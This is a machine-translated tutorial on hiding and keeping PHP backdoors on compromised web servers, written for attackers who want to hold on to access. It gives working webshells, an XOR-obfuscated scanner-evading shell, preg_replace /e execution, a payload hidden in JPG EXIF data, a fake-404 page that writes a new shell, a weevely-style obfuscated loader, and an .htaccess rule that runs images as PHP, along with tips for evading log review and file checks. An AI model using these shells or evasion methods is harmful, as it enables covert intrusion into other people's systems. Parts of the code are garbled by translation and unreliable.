PHP backdoor hiding and maintenance skills, php backdoor skills

PHP backdoor hiding and maintenance skills, php backdoor skills

After a successful test, we usually want to keep the privilege longer. the work of leaving a backdoor is crucial. Generally, the backdoor layout includes but is not limited to database permissions, WEB permissions, system user permissions, and so on. in this article, some ideas hidden from the public backdoors are popularized.

AD:

0 × 00 Preface

After a successful test, we usually want to keep the privilege longer. the work of leaving a backdoor is crucial. Generally, the backdoor layout includes but is not limited to database permissions, WEB permissions, system user permissions, and so on. this article describes some ideas hidden from the public backdoors.

<? Php @ eval ($ _ POST ['cmd']);?>

Or

1. <? Php @ assert ($ _ POST ['cmd']);?>

Of course, this is only different from the called functions. For PHP Disabled functions, find them in php. ini: disable_functions.

However, there are also many ways for O & M to intuitively find our shell, such

◆ An exception was found during file backup comparison by file name/modification time/size

◆ WEBSHELL scan scripts, such as Scanbackdoor. php/Pecker/shelldetect. php and various Scanners

◆ Access. log is used to find the backdoor

◆ Or, we will be blocked by WAF for a test sentence, and a warning log, etc.

For common detection methods, summarize the following seven common methods to hide shell

0 × 01 avoidance

Look at the various backdoor scanning code and you will know, leaving a well-known keyword in shell is absolutely impossible.

Common keywords include:

◆ System Command Execution: system, passthru, shell_exec, exec, popen, proc_open

◆ Code execution: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

◆ File Inclusion: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

In the past, some friends wittically used $ _ POST [0] ($ _ POST [1]) to execute commands. Unfortunately, it is still difficult to escape the scanner's eye, but the construction method is infinite in Vientiane.

Tudouya provides [A Construction Technique] (http://www.freebuf.com/articles/web/33824.html) Exploitation on FREEBUF.

1. <? Php
2. @ $ _ ++; // $ _ = 1
3. $ __= ("#" ^ "|"); // $ __= _
4. $ __. = ("." ^ "~ "); // _ P
5. $ __. = ("/" ^ "'"); // _ PO
6. $ __. = ("|" ^ "/"); // _ POS
7. $ __. = ("{" ^ "/"); // _ POST
8. $ {$ __}[! $ _] ($ {$ __} [$ _]); // $ _ POST [0] ($ _ POST [1]);
9. ?>

Construct and generate, of course, too intuitive to write

1. <? Php @ $ _ ++; $ __= ("#" ^ "|"). ("." ^ "~ "). ("/" ^ "'"). ("|" ^ "/"). ("{" ^ __}[! $ _] ($ {__} [$ _]);?>

Then fill in some common code for disguise. A simple "Kill-free" shell sample will appear.

Run the command correctly and bypass the common scanner. You can also use it to write a new temporary shell.

 

0 × 02 features

Using syntax features to execute commands is also an interesting method. Using the syntax features of php when processing variables, it will analyze whether the data in double quotation marks contains variables (and parse their values)

Eg .:

1. $ {@ Eval (phpinfo ())}

{} The variable content in double quotation marks can be parsed. @: Keep the variable running after an error occurs.

Then we can shake the chart and start to construct a hidden backdoor. But here we want to construct the command execution caused by the function. That's right, it's preg_replace.

1. <? Php @ preg_replace ("// e", $ _ POST ['cmd'], "");?>

This method has already been blacklisted by the scanner. You can simply modify it.

1. <? Php
2. Function funfunc ($ str ){}
3. Echo preg_replace ("/<title> (. + ?) <\/Title>/ies ", 'funfunc (" \ 1 ") ', $ _ POST [" cmd "]);
4. ?>

Executed, not found

The execution method is obvious. code execution is triggered when the {$ {phpinfo ()} passed in funfunc after regular expression matching.

1. Funfunc ("{$ {phpinfo ()}}")

Another method

1. <? Php @ assert ("\ $ arr = \" ". $ _ GET ['cmd']." \ ";");?>

0 × 03 contain

File Inclusion is a method that has been used by everyone, but it also contains skills.

A common file may only contain an include file containing a txt or jpg file, or even directly contains a vulnerability. However, the scanner is also easy to detect, and more include files are easy to detect.

Check this script

1. <? Php
2. If (@ isset ($ _ GET [content])
3. {
4. $ Fp = fopen ('readme ', 'w ');
5. File_put_contents ('readme ', "<? Php \ r \ n ");
6. @ File_put_contents ('readme ', $ _ GET [content], FILE_APPEND );
7. Fclose ($ fp );
8. Require 'readme ';}
9. ?>

It solves a problem. The required shell can be generated as needed, and then include

Unfortunately, file_put_contents and other functions are too sensitive and can be easily scanned and discovered.

Code Generation Method to create a shell, which is generated with access.

1. <? Php @ fputs (fopen (base64_decode ('cgx1z2lux20ucghw'), w), base64_decode ('samples/Pg = '));
2. ?>

Some scanners can be avoided, but this mode is also quite eye-catching. The new files generated must also be easily hidden to escape detection and removal.

Of course, we will not consider new concepts such as heuristic.

In this way, attackers can not meet their needs.

1. <? Php $ exif = exif_read_data ('./lol.jpg'); preg_replace ($ exif ['make'], $ exif ['model'], '');?>

Reference: a backdoor hidden in jpg image EXIF

This time, you do not need to simply copy/B to generate an image horse. It is just as feasible to use the specific marker of the preg_replace execution file.

The following message may be displayed: Call to undefined function exif_read_data ()

You need to modify php. ini, extension = php_exif.dll

Change the Loading Order to the end of extension = php_mbstring.dll.

As you can see, this image Backdoor uses the preg_replace \ e parameter, relies on php variable parsing and execution, and uses base64 encoding. Finally, relies on the file ID to splice a complete shell, A small reminder for kids shoes hidden from Backdoors

Of course, as long as there are include points, the forms of including files are diverse, and even include error_log (although it may be worth consideration), only unexpected...

0 × 04 hiding

In order to prevent visitors from discovering the existence of backdoors, smart security researchers will also be confused.

1. <! Doctype html public "-// IETF // dtd html 2.0 // EN">
2. <Html>
3. <Title> 404 Not Found </title>
4. </Head>
5. <Body>
6. <H1> Not Found
7. <P> The requested URL was not found on this server. </p>
8. </Body>
9. </Html>
10. <? Php
11. @ Preg_replace ("/[checksql]/e", $ _ POST ['cmd'], "saft ");
12. ?>

With the help of the above html Rendering, browsing the page has begun to disguise 404 to confuse the audio and video

However, visitors cannot hide log analysis. To better hide a large number of logs, construct the following script:

1. <? Php
2. Header ('HTTP/1.1 404 ');
3. Ob_start ();
4. @ Fputs (fopen (base64_decode ('cgx1z2lux20ucghw'), w), base64_decode ('samples/Pg = '));
5. Ob_end_clean ();
6. ?>

The access is actually 404. That's right. The same is true in the log.

However, the current directory has generated the script to be connected.

0 × 05 Obfuscation

We should know that the kids shoes that have used the weevely tool generate a kill-free shell like this.

1. <? Php
2. $ Penh = "bytes = ";
3. $ Kthe = "success ";
4. $ Ftdf = str_replace ("w", "", "stwrw_wrwepwlwawcwe ");
5. $ Wmmi = "Hangzhou ";
6. $ Zrmt = "Hangzhou ";
7. $ Smgv = $ ftdf ("f", "", "bfafsfef6f4_fdfefcodfe ");
8. $ Jgfi = $ ftdf ("l", "", "lclrlelaltel_functlilon ");
9. $ Rdwm = $ jgfi ('', $ smgv ($ ftdf (" gi "," ", $ zrmt. $ kthe. $ wmmi. $ penh); $ rdwm ();
10. ?>

This is what follows the connection under the terminal

Ps: I forgot to modify the terminal code :(

The kill-free method is to generate random name variables in a fixed area, and then use str_replace to splice base64_decode to execute the command.

Of course, this is to hide the audio and video at the code level to escape the scanner

More common methods for audio/video recognition:

◆ File modification time

◆ Rename the file to the uploaded folder, which makes it impossible to see the file exception

◆ Disguised processing of file size (at least looks like a normal script)

◆ Select the hiding path and minimize access

◆ Malformed directory % 20

Space directories are relatively easy to find.

0 × 06 Parsing

Use. htaccess to add resolution Backdoors

For example:

1. AddType application/x-httpd-php. jpg

Take weeverly as an example.

0x07 Mixture

To sum up the above methods, most of them are just a process of constructing vulnerabilities. The Code Constructed by vulnerabilities can be amazing, and the backdoor can be amazing. you can write fine and graceful statements, or you can make simple and rude statements, but it is only applicable to different scenarios. it is not difficult to construct your own hidden shell if you can integrate your ideas well. the above is just a summary of experience. You may have interesting ideas and hope to give me some advice.